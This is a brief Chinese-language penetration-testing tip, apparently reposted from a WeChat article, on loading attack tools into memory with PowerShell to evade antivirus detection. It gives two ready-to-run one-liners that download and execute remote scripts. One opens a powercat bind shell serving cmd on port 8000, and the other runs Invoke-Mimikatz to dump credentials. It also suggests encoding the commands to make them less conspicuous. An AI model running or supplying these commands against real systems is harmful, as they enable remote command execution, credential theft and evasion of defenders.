2018-03-08 17:11:54 Author: mp.weixin.qq.com(查看原文) 阅读量:3 收藏

前言

大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。

正文

渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。

ps版nc链接如下:

https://github.com/besimorhino/powercat

可以本地执行,也可以远程执行,远程执行命令如下:

powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"

然后远程连接执行命令即可

当然,如果嫌弃该命令太暴露,可以对其进行编码

mimikatz密码抓取同理

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4NjQxMDcxNA==&mid=2709352216&idx=1&sn=734ff465111769cea56a4f17202f876e&chksm=bb40dbad8c3752bb83e75bc0922fe2f7f48b9e567136fb20cfdbf04e6c08fc0db18bc77706d0&mpshare=1&scene=2&srcid=0308GI6w1H6PKDAJ02ZYUilY&from=timeline#rd
如有侵权请联系:admin#unsafe.sh